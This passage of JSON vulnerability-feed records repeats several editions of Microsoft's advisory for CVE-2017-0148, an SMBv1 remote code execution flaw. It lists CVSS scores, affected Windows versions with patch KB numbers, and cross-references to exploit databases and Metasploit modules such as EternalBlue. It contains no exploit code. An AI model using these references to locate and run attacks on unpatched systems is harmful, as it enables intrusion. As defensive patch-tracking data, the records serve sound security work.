Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T15:08:23", "differentElements": ["msAffectedSoftware"], "edition": 32}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T16:48:04", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4013198", "KB3210721", "KB4012214", "KBMS16-110, 3187754", "KB4012598", "KB4012215", "KB3177186", "KB3210720", "KB3212646", "KB4012217", "KB4013429", "KB3205409", "KB4012216", "KB3213986", "KB4012212", "KB4012606", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T16:48:04", "differentElements": ["msAffectedSoftware"], "edition": 33}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T19:05:15", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012215", "KB4012212", "KB4012598", "KB3210721", "KB3212646", "KB4012606", "KB4013198", "KBMS16-110, 3187754", "KB3210720", "KB4013429", "KB3205401", "KB3205409", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T19:05:15", "differentElements": ["msAffectedSoftware"], "edition": 34}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T20:47:14", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", 